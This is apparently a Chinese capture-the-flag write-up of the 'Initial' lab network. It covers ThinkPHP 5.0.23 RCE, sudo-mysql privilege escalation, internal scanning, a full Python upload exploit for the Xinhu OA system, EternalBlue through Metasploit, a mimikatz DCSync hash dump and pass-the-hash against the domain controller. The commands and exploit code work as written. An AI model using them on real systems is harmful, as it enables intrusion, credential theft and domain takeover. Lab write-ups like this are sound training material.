Initial

Flag01

靶机ip:39.101.196.35

image-20240825132947356

发现是thinkphp

image-20240825133228989

存在ThinkPHP 5.0.23 RCE,进行getshell

image-20240825133302257

尝试蚁剑连接,发现读/root目录要提权

image-20240825133619220

尝试进行sudo提权

image-20240825133740259

mysql的sudo提权

Linux提权之Sudo 70种提权方法 - 简单安全 (huangmj.com)

image-20240825133820610

查看带有flag的文件

sudo mysql -e '\! find / -type f -name '*flag*' 2>/dev/null'

image-20240825133954908

文件读取

sudo mysql -e '\! cat /root/flag/flag01.txt'

image-20240825134030589

拿到flag01 提示到下一个flag在内网

flag01: flag{60b53231-

Flag02

查看网卡信息

image-20240825135545877

先上传一个fscan,扫描内网

./fscan -h 172.22.1.1/24 -o result.txt
结果如下:
172.22.1.21:139 open
172.22.1.18:139 open
172.22.1.2:139 open
172.22.1.21:135 open
172.22.1.18:135 open
172.22.1.2:135 open
172.22.1.18:80 open
172.22.1.15:22 open
172.22.1.2:88 open
172.22.1.18:3306 open
172.22.1.21:445 open
172.22.1.18:445 open
172.22.1.2:445 open
172.22.1.15:80 open
[*] WebTitle http://172.22.1.15        code:200 len:5578   title:Bootstrap Material Admin
[*] NetInfo 
[*]172.22.1.18
   [->]XIAORANG-OA01
   [->]172.22.1.18
[*] NetInfo 
[*]172.22.1.21
   [->]XIAORANG-WIN7
   [->]172.22.1.21
[*] NetInfo 
[*]172.22.1.2
   [->]DC01
   [->]172.22.1.2
[*] OsInfo 172.22.1.2    (Windows Server 2016 Datacenter 14393)
[+] MS17-010 172.22.1.21    (Windows Server 2008 R2 Enterprise 7601 Service Pack 1)
[*] NetBios 172.22.1.2      [+] DC:DC01.xiaorang.lab             Windows Server 2016 Datacenter 14393
[*] NetBios 172.22.1.21     XIAORANG-WIN7.xiaorang.lab          Windows Server 2008 R2 Enterprise 7601 Service Pack 1
[*] NetBios 172.22.1.18     XIAORANG-OA01.xiaorang.lab          Windows Server 2012 R2 Datacenter 9600
[*] WebTitle http://172.22.1.18        code:302 len:0      title:None 跳转url: http://172.22.1.18?m=login
[*] WebTitle http://172.22.1.18?m=login code:200 len:4012   title:信呼协同办公系统
[+] PocScan http://172.22.1.15 poc-yaml-thinkphp5023-method-rce poc1
172.22.1.2:88 open
172.22.1.15:22 open
172.22.1.18:445 open
172.22.1.18:3306 open
172.22.1.21:445 open
172.22.1.2:445 open
172.22.1.21:139 open
172.22.1.18:139 open
172.22.1.2:139 open
172.22.1.21:135 open
172.22.1.18:135 open
172.22.1.2:135 open
172.22.1.18:80 open
172.22.1.15:80 open
[*] NetInfo 
[*]172.22.1.2
   [->]DC01
   [->]172.22.1.2
[*] NetInfo 
[*]172.22.1.18
   [->]XIAORANG-OA01
   [->]172.22.1.18
[*] NetInfo 
[*]172.22.1.21
   [->]XIAORANG-WIN7
   [->]172.22.1.21
[+] MS17-010 172.22.1.21    (Windows Server 2008 R2 Enterprise 7601 Service Pack 1)
[*] OsInfo 172.22.1.2    (Windows Server 2016 Datacenter 14393)
[*] NetBios 172.22.1.21     XIAORANG-WIN7.xiaorang.lab          Windows Server 2008 R2 Enterprise 7601 Service Pack 1
[*] NetBios 172.22.1.2      [+] DC:DC01.xiaorang.lab             Windows Server 2016 Datacenter 14393
[*] NetBios 172.22.1.18     XIAORANG-OA01.xiaorang.lab          Windows Server 2012 R2 Datacenter 9600
[*] WebTitle http://172.22.1.15        code:200 len:5578   title:Bootstrap Material Admin
[*] WebTitle http://172.22.1.18        code:302 len:0      title:None 跳转url: http://172.22.1.18?m=login
[*] WebTitle http://172.22.1.18?m=login code:200 len:4012   title:信呼协同办公系统
[+] PocScan http://172.22.1.15 poc-yaml-thinkphp5023-method-rce poc1

172.22.1.2   DC域控
172.22.1.21  MS17-010永恒之蓝
172.22.1.18  信呼OA系统

搭建代理

./gost -L=:10000

开启HTTP/SOCKS5代理,他会开启跳板机的10000端口作为代理端口,后面使用proxifier连接跳板机的ip及10000端口

image-20240825141847807

可以浏览器正常访问

image-20240825141914249

搜索到现成的exp

# 1.php为webshell

# 需要修改以下内容:
# url_pre = 'http://<IP>/'
# 'adminuser': '<ADMINUSER_BASE64>',
# 'adminpass': '<ADMINPASS_BASE64>',

import requests

session = requests.session()
url_pre = 'http://172.22.1.18/'
url1 = url_pre + '?a=check&m=login&d=&ajaxbool=true&rnd=533953'
url2 = url_pre + '/index.php?a=upfile&m=upload&d=public&maxsize=100&ajaxbool=true&rnd=798913'
# url3 = url_pre + '/task.php?m=qcloudCos|runt&a=run&fileid=<ID>'
data1 = {
    'rempass': '0',
    'jmpass': 'false',
    'device': '1625884034525',
    'ltype': '0',
    'adminuser': 'YWRtaW4=',
    'adminpass': 'YWRtaW4xMjM=',
    'yanzm': ''
}

r = session.post(url1, data=data1)
r = session.post(url2, files={'file': open('1.php', 'r+')})
filepath = str(r.json()['filepath'])
filepath = "/" + filepath.split('.uptemp')[0] + '.php'
print(filepath)
id = r.json()['id']
url3 = url_pre + f'/task.php?m=qcloudCos|runt&a=run&fileid={id}'
r = session.get(url3)
r = session.get(url_pre + filepath + "?1=system('dir');")
print(r.text)

image-20240825142657437

使用蚁剑连接

image-20240825142903818

拿到flag02

flag02: 2ce3-4813-87d4-

Flag03

172.22.1.21是个ms17-010,上msf打就完事了

先配置msf的socks5代理

vim /etc/proxychains4.conf

image-20240825145114463

proxychains4 msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp_uuid
set RHOSTS 172.22.1.21
exploit

image-20240825144233898

成功连接(等待几分钟)

永恒之蓝打了之后本身就是SYSTEM权限,可以mimikatz搜集域内用户hash

load kiwi
kiwi_cmd lsadump::dcsync /domain:xiaorang.lab /all /csv

image-20240825144945909

再用crackmapexec打PTH拿下域控

proxychains crackmapexec smb 172.22.1.2 -u administrator -H10cf89a850fb1cdbe6bb432b859164c8 -d xiaorang.lab -x "type Users\Administrator\flag\flag03.txt"

image-20240825144650045

得到flag03

flag03: e8f88d0d43d6}

FLAG

flag{60b53231-2ce3-4813-87d4-e8f88d0d43d6}